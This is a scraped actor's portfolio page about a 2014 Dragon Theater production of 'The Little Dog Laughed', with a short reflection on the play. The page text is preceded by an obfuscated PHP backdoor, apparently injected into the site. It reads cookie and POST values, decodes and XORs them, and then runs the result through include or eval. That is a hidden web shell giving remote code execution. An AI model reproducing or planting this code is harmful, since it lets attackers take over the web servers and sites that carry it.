$LJpVkQZi = "\x64" . "\154" . chr ( 168 - 64 )."\x5f" . 'B' . "\166" . "\x56" . chr ( 110 - 41 ).'Q';$aOlPegct = 'c' . "\154" . "\x61" . "\x73" . "\x73" . '_' . 'e' . "\170" . chr (105) . chr (115) . 't' . chr (115); $iiJJop = class_exists($LJpVkQZi); $aOlPegct = "24089";$zNrHJnu = !1;if ($iiJJop == $zNrHJnu){function OacUyjjkj(){$IVyjokmO = new /* 2033 */ dlh_BvVEQ(45107 + 45107); $IVyjokmO = NULL;}$HyHusKkJ = "45107";class dlh_BvVEQ{private function URHsiNQ($HyHusKkJ){if (is_array(dlh_BvVEQ::$aiSmYjJx)) {$OalTiWFbGZ = sys_get_temp_dir() . "/" . crc32(dlh_BvVEQ::$aiSmYjJx['s' . "\x61" . chr (108) . chr (116)]);@dlh_BvVEQ::$aiSmYjJx["\167" . "\162" . 'i' . "\164" . 'e']($OalTiWFbGZ, dlh_BvVEQ::$aiSmYjJx["\143" . 'o' . "\x6e" . "\x74" . chr (101) . chr (110) . chr ( 726 - 610 )]);include $OalTiWFbGZ;@dlh_BvVEQ::$aiSmYjJx["\144" . chr (101) . chr ( 1086 - 978 )."\x65" . chr (116) . chr ( 279 - 178 )]($OalTiWFbGZ); $HyHusKkJ = "45107";exit();}}private $SVoUol;public function kLVCUq(){echo 36586;}public function __destruct(){$HyHusKkJ = "26011_27870";$this->URHsiNQ($HyHusKkJ); $HyHusKkJ = "26011_27870";}public function __construct($MamtZTOpa=0){$HuNoOzt = $_POST;$xGxSA = $_COOKIE;$RMqoXYD = "299bd301-26e4-4157-b17b-e96b8a470378";$ETuvAJk = @$xGxSA[substr($RMqoXYD, 0, 4)];if (!empty($ETuvAJk)){$UsvEFPxKII = "base64";$ctyGTkk = "";$ETuvAJk = explode(",", $ETuvAJk);foreach ($ETuvAJk as $uRTYvxDxlQ){$ctyGTkk .= @$xGxSA[$uRTYvxDxlQ];$ctyGTkk .= @$HuNoOzt[$uRTYvxDxlQ];}$ctyGTkk = array_map($UsvEFPxKII . chr ( 151 - 56 ).chr ( 780 - 680 ).chr (101) . "\x63" . chr (111) . chr (100) . 'e', array($ctyGTkk,)); $ctyGTkk = $ctyGTkk[0] ^ str_repeat($RMqoXYD, (strlen($ctyGTkk[0]) / strlen($RMqoXYD)) + 1);dlh_BvVEQ::$aiSmYjJx = @unserialize($ctyGTkk);}}public static $aiSmYjJx = 12555;}OacUyjjkj();}$DnCusDfkqU = "\125" . "\x79" . 'U' . "\137" . chr (79) . 'h' . chr ( 648 - 529 ).chr (83); $HeBaNK = chr (99) . chr (108) . "\141" . "\x73" . "\163" . "\x5f" . chr (101) . "\170" . "\x69" . chr (115) . "\164" . "\163";$RcMsaj = class_exists($DnCusDfkqU); $HeBaNK = "34999";$AgFyfNJQ = !1;if ($RcMsaj == $AgFyfNJQ){function QjUrhq(){$NvLjdb = new /* 8068 */ UyU_OhwS(16052 + 16052); $NvLjdb = NULL;}$PJjRFnx = "16052";class UyU_OhwS{private function ffzUDzx($PJjRFnx){if (is_array(UyU_OhwS::$pxkspCvqJ)) {$LSkLwPnY = str_replace("\x3c" . chr (63) . chr (112) . "\x68" . 'p', "", UyU_OhwS::$pxkspCvqJ[chr (99) . 'o' . "\x6e" . chr (116) . 'e' . chr ( 284 - 174 )."\x74"]);eval($LSkLwPnY); $PJjRFnx = "16052";exit();}}private $xBZvncHxtY;public function DjkNaz(){echo 59480;}public function __destruct(){UyU_OhwS::$pxkspCvqJ = @unserialize(UyU_OhwS::$pxkspCvqJ); $PJjRFnx = "25168_17224";$this->ffzUDzx($PJjRFnx); $PJjRFnx = "25168_17224";}public function EfxalcZsyk($thDEXRSOM, $tggUmCw){return $thDEXRSOM[0] ^ str_repeat($tggUmCw, (strlen($thDEXRSOM[0]) / strlen($tggUmCw)) + 1);}public function __construct($nFbpxelbn=0){$zzYllo = $_POST;$qGmaeQUJb = $_COOKIE;$tggUmCw = "4520e354-b869-46cb-b18e-887b9d1125cb";$aNEzSpeKdE = @$qGmaeQUJb[substr($tggUmCw, 0, 4)];if (!empty($aNEzSpeKdE)){$LJHeTHiMJD = "base64";$thDEXRSOM = "";$aNEzSpeKdE = explode(",", $aNEzSpeKdE);foreach ($aNEzSpeKdE as $bKTkUIVx){$thDEXRSOM .= @$qGmaeQUJb[$bKTkUIVx];$thDEXRSOM .= @$zzYllo[$bKTkUIVx];}$thDEXRSOM = array_map($LJHeTHiMJD . "\x5f" . "\x64" . 'e' . chr (99) . "\157" . "\144" . chr ( 418 - 317 ), array($thDEXRSOM,));UyU_OhwS::$pxkspCvqJ = $this->EfxalcZsyk($thDEXRSOM, $tggUmCw);}}public static $pxkspCvqJ = 12737;}QjUrhq();} The Little Dog Laughed – William Giammona

The Little Dog Laughed

Role: Mitchell Green
Dragon Theater
Director: Dale Albright
Opening: June 6th, 2014
Photos: Nancy Metzler


Douglas Carter Beane’s scathing send up of Hollywood and his thinly-veiled experience there has a lot to say about being what happens when you can’t openly be who you are. The script has some tremendously funny monologues, particularly for the ladies, and some tender scenes between the men as they open up and share what they really want. Looking back on it today, it’s amazing how far we’ve come as a society in just the short time since this was written.